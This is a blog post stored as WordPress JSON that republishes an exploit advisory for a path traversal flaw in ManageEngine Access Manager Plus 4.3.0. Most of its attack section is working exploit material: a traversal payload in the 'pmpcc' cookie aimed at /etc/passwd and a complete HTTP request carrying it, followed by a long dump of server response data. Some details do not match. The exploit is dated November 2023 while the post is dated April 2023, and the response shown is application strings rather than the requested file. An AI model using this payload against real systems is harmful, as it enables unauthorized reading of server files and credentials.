{"id":39907,"date":"2023-04-03T23:49:06","date_gmt":"2023-04-03T19:49:06","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171645\/manageengineamp430-traversal.txt"},"modified":"2023-04-10T13:22:36","modified_gmt":"2023-04-10T08:52:36","slug":"manageengine-access-manager-plus-4-3-0-path-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/manageengine-access-manager-plus-4-3-0-path-traversal\/","title":{"rendered":"ManageEngine Access Manager Plus 4.3.0 Path Traversal"},"content":{"rendered":"

## Exploit Title: ManageEngine Access Manager Plus 4.3.0 – File-path-traversal
\n## Author: nu11secur1ty
\n## Date: 11.22.2023
\n## Vendor: https:\/\/www.manageengine.com\/
\n## Software: https:\/\/www.manageengine.com\/privileged-session-management\/download.html
\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/ManageEngine\/Access-Manager-Plus-version-4.3-(Build-4309)<\/p>\n

## Description:
\nThe `pmpcc` cookie is vulnerable to path traversal attacks, enabling
\nread access to arbitrary files on the server.
\nThe testing payload
\n…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/etc\/passwd
\nwas submitted in the pmpcc cookie.
\nThe requested file was returned in the application’s response.
\nThe attacker easy can see all the JS structures of the server and can
\nperform very dangerous actions.<\/p>\n

## STATUS: HIGH Vulnerability<\/p>\n[+] Exploits:
\n“`GET
\nGET \/amp\/webapi\/?requestType=GET_AMP_JS_VALUES HTTP\/1.1
\nHost: localhost:9292
\nAccept-Encoding: gzip, deflate
\nAccept: *\/*
\nAccept-Language: en-US;q=0.9,en;q=0.8
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)
\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.5304.107
\nSafari\/537.36
\nConnection: close
\nCache-Control: max-age=0
\nCookie: pmpcc=…%2f.%2f…%2f.%2f…%2f.%2f…%2f.%2f…%2f.%2f…%2f.%2f…%2f.%2f…%2f.%2f…%2f.%2f…%2f.%2fetc%2fpasswd;
\n_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;
\nJSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;
\nJSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194
\nSec-CH-UA: “.Not\/A)Brand”;v=”99″, “Google Chrome”;v=”107″, “Chromium”;v=”107″
\nSec-CH-UA-Mobile: ?0
\nX-Requested-With: XMLHttpRequest
\nSec-CH-UA-Platform: Windows
\nReferer: https:\/\/localhost:9292\/AMPHome.html
\n“`<\/p>\n[+] Response:<\/p>\n

“`
\n,’js.pmp.helpCertRequest.subcontent10′:’The issued certificate is
\ne-mailed to the user who raises the request, the user who closes the
\nrequest and also to those e-mail ids specified at the time of closing
\nthe request.’
\n,’js.admin.HelpDeskIntegrate.UsernameEgServiceNow’:’ServiceNow login username’
\n,’js.PassTrixMainTab.ActiveDirectory.next_schedule_time’:’Next
\nsynchronization is scheduled to run on’
\n,’js.agent.csharp_Windows_Agent’:’C# Windows Agent’
\n,’js.PassTrixMainTab.in_sec’:’Seconds’
\n,’godaddy.importcsr.selectfileorpastecontent’:’Either select a file or
\npaste the CSR content.’
\n,’js.connection.colors’:’Colors’
\n,’js.general.ShareToGroups’:’Share resource to user groups’
\n,’js.connection.mapdisk’:’Drives’
\n,’jsp.admin.Support.User_Forums’:’User Forums’
\n,’js.general.CreateResource.Dns_url_check’:’Enter a valid URL . For
\ncloud services (Rackspace and AWS IAM), the DNS name <br>looks like a
\nURL (ex: https:\\\/\\\/identity.api.rackspacecloud.com\\\/v2.0)’
\n,’js.admin.RPA_Integration.About’:’PAM360 renders bots that seamlessly
\nintegrate and perfectly fit into the pre-designed and automated
\nintegrations of the below listed RPA-powered platforms, to simulate
\nthe routine manual password retrieval from the PAM360 vault.’
\n,’js.discovery.loadhostnamefromfile’:’From file’
\n,’js.AddListenerDetails.Please_enter_valid_implementation_class’:’Please
\nenter a valid Implementation Class’
\n,’js.general.GroupedResources’:’Grouped Resources’
\n,’js.general.SlaveServer’:’This operation is not permitted in Secondary Server.’
\n,’PROCESSID’:’Process Id’
\n,’js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully’:’Services
\nfetched successfully’
\n,’assign.defaultdns.nodnsconfigured’:’No default DNS available\\\/enabled’
\n,’js.commonstr.search’:’Search’
\n,’js.discovery.usercredential_type’:’Credential Type’
\n,’jsp.admin.GeneralSetting.Check_high_availability_status_for’:’Check
\nhigh availability status every <input type=\\”text\\” class=\\”txtbox\\”
\nname=\\”check_duration\\” value=\\”{0}\\” size=\\”5\\” maxlength=\\”5\\”
\nstyle=\\”width:60px\\” onkeypress=\\”if(event.keyCode==13)return false;\\”
\n> minutes.’
\n,’pki.js.help.entervalidnumber’:’Please enter a valid number for
\nNumeric Field Default Value.’
\n,’js.remoteapp.fetch’:’Fetch’
\n,’js.admin.HighAvailability.configured_successfully’:’Configured Successfully’
\n,’js.generalSettings_searchTerm_Password_reset’:’Password Reset,
\nReason for password reset, disable ticket id, waiting time, wait time
\nfor service account password reset, linux unix password reset’
\n,’letsencrypt.enter.domainnames’:’Enter domain names’
\n,’js.discovery.resourcetype’:’Resource Type’
\n,’js.HomeTab.UserTab’:’Set this tab as default view for \\’Users\\”
\n,’js.report.timeline.todate’:’Valid To’
\n,’js.general_Language_Changed_Successfully’:’Language Changed Successfully’
\n,’js.aws.credentials.label’:’AWS Credential’
\n,’auditpurge.helpnote1′:’Enter 0 or leave the field blank to disable
\npurging of audit trails.’
\n,’js.general.user.orgn_bulkManage’:’Manage Organization’
\n,’js.rolename.SSH_KEY’:’Create\\\/Add key’
\n,’js.admin.admin.singledbmultiserver.name’:’Application Scaling’
\n,’lets.encrypt.requestreport’:’Let\\’s Encrypt Requests Report’
\n,’js.settings.breach_settings.disable_api’:’Disable API Access’
\n,’js.cmd.delete.not_possible’:’Command cannot be deleted as it is
\nalready added to the following command set(s).’
\n,’js.settings.notification.domaincontent’:’Notify if domains are
\nexpiring within’
\n,’js.aws.searchuser’:’–Search UserName–‘
\n,’jsp.admin.GeneralSetting.helpdesk_conf’:’Configure the ticketing
\nsystem settings in Admin >> General >> Ticketing System Integration.’
\n,’js.discovery.port’:’Gateway Port’
\n,’usermanagement.showCertificates’:’Show Certificates’
\n,’js.general.DestinationDirectoryCannotBeEmpty’:’Destination directory
\ncannot be empty’
\n,’js.sshreport.title’:’SSH Resource Report’
\n,’js.encryptionkey.update’:’Update’
\n,’js.aws.regions’:’Region’
\n,’js.settingsTitle1.UserManagement’:’User Management’
\n,’js.passwordPolicy.setRange’:’Enforce minimum or maximum password length’
\n,’js.commonstr.selectResources’:’Select Resources’
\n,’RULENAME’:’Rule Name’
\n,’jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully’:’User
\nGroup added successfully’
\n,’js.reports.SSHReports.title’:’SSH Reports’
\n,’js.CommonStr.ValueIsLess’:’value is less than 2′
\n,’js.discovery.discoverystatus’:’Discovery Status’
\n,’js.settings.security_settings.Web_Access’:’Web Access’
\n,’js.general.node_name_cannot_be_empty’:’Node name cannot be empty’
\n,’js.deploy.audit’:’Deploy Audit’
\n,’js.agentdiscovery.msca.title’:’Microsoft Certificate Authority’
\n,’jsp.resources.AccessControlView.Choose_the_excluded_groups’:’Nominate
\nuser group(s) to exempt from access control.’
\n,’js.pki.SelectCertificateGroup’:’Select Certificate Group(s)’
\n,’js.admin.HighAvailability.High_Availability_status’:’Status’
\n,’settings.metracker.note0′:’Disable ME Tracker if you do not wish to
\nallow ManageEngine to collect product usage details.’
\n,’SERVICENAME’:’Service Name’
\n,’settings.metracker.note1′:’Access Manager Plus server has to be
\nrestarted for the changes to take effect.’
\n,’js.general.NewPinMismatch’:’New PIN Mismatch’
\n,’js.HomeTab.ResourceTab’:’Set this tab as default view for \\’Resources\\”
\n,’java.ScheduleUtil.minutes’:’minutes’
\n,’js.admin.sdpop_change.tooltip’:’Enabling this option will require
\nyour users to provide valid Change IDs for the validation of password
\naccess requests and other similar operations. Leaving this option
\nunchecked requires the users to submit valid Request IDs for
\nvalidation.’
\n,’js.privacy_settings.title.redact’:’Redact’
\n,’js.admin.passwordrequests.Target_Resource_Selection_Alert’:’Only 25
\nresources can be selected’
\n,’js.aboutpage.websitetitle’:’Website’
\n,’js.customize.NumericField’:’Numeric Field’
\n,’js.please.select.file’:’Please select a file to upload.’
\n,’js.AutoLogon.Remote_connections’:’Remote Connections’
\n,’pki.snmp.port’:’Port’
\n,’java.dashboardutils.TODAY’:’TODAY’
\n,’js.schedule.starttime’:’Start Time’
\n,’js.ssh.keypassphrase’:’Passphrase’
\n,’js.gettingstarted.keystore.step1.one’:’Add keys to Access Manager Plus’
\n,’js.analytics.tab.ueba.msg4′:’guide’
\n,’js.analytics.tab.ueba.msg5′:’to complete the integration. For any
\nfurther questions, please write to us at
\npam360-support@manageengine.com.’
\n,’js.reportType.Option7.UserAuditReport’:’Audit Report’
\n,’js.common.csr’:’CSR’
\n,’js.globalsign.reissue.order’:’Reissue Order’
\n,’js.analytics.tab.ueba.msg6′:’Build a platform of expected behavior
\nfor individual users and entities by mapping different user accounts’
\n,’js.analytics.tab.ueba.msg7′:’Verify actionable reports that
\nsymbolize compromise with details about actual behavior and expected
\nbehavior.’
\n,’js.resources.importcredential’:’Import Credentials’
\n,’js.analytics.tab.ueba.msg1′:’The Advanced Analytics module for
\nPAM360, offered via ManageEngine Log360 UEBA, analyzes logs from
\ndifferent sources, including firewalls, routers, workstations,
\ndatabases, file servers and cloud services. Any deviation from normal
\nbehavior is classified as a time, count, or pattern anomaly. It then
\ngives actionable insight to the IT Administrator with the use of risk
\nscores, anomaly trends, and intuitive reports.’
\n,’js.analytics.tab.ueba.msg2′:’With Log360 UEBA analytics, you can:’
\n,’js.analytics.tab.ueba.msg3′:’To activate Log360 UEBA for your PAM360
\ninstance, download Log360 UEBA from the below link and follow the
\ninstructions in this’
\n,’js.settingsTitle2.MailServer’:’Mail Server’
\n,’jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key’:’Managing
\nAMP Encryption Key’
\n,’settings.unmappedmails.email’:’E-mail Address’
\n,’amp.connection.connection_type’:’Connection Type’
\n,’js.analytics.tab.ueba.msg8′:’Diagnose anomalous user behavior based
\non activity time, count, and pattern.’
\n,’godaddy.contactphone’:’Contact Phone’
\n,’js.general.HelpDeskIntegrate.ClassSameException’:’Class name already
\nimplemented. Implement with some other class.’
\n,’js.analytics.tab.ueba.msg9′:’Track abnormal entity behaviors in
\nWindows devices, SQL servers, FTP servers, and network devices such as
\nrouters, firewalls, and switches.’
\n,’js.rolename.freeCA.acme’:’ACME’
\n,’digicert.label.dcv.cname’:’CNAME Token’
\n,’js.helpcontent.createuser’:’User Creation ‘
\n,’pgpkeys.key.details’:’Key Information’
\n,’js.resources.discovery.ResourceDiscoveryStatus.discovery’:’Discovery Status’
\n,’js.HomeTab.TaskAuditView’:’Task Audit’
\n,’pki.js.certs.certGroupsSharedByUserGroups’:’Certificate Groups
\nShared With User Group(s)’
\n,’js.common.importcsr.format’:'(File format should be .csr)’
\n,’js.notificationpolicy.Submit’:’Save’
\n,’pmp.vct.User_Audit_Configuration’:’User Audit Configuration’
\n…
\n…
\n…
\n“`<\/p>\n

## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/ManageEngine\/Access-Manager-Plus-version-4.3-(Build-4309))<\/p>\n

## Reference:
\n[href](https:\/\/portswigger.net\/kb\/issues\/00100300_file-path-traversal)<\/p>\n

## Proof and Exploit:
\n[href](https:\/\/streamable.com\/scdzsb)<\/p>\n

## Time spent
\n`03:00:00`<\/p>\n","protected":false},"excerpt":{"rendered":"

## Exploit Title: ManageEngine Access Manager Plus 4.3.0 – File-path-traversal ## Author: nu11secur1ty ## Date: 11.22.2023 ## Vendor: https:\/\/www.manageengine.com\/ ## Software: https:\/\/www.manageengine.com\/privileged-session-management\/download.html ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/ManageEngine\/Access-Manager-Plus-version-4.3-(Build-4309) ## Description: The `pmpcc` cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. The testing payload …\/.\/…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/…\/.\/etc\/passwd was submitted in the pmpcc cookie. …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-39907","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39907","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=39907"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39907\/revisions"}],"predecessor-version":[{"id":40199,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39907\/revisions\/40199"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=39907"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=39907"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=39907"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}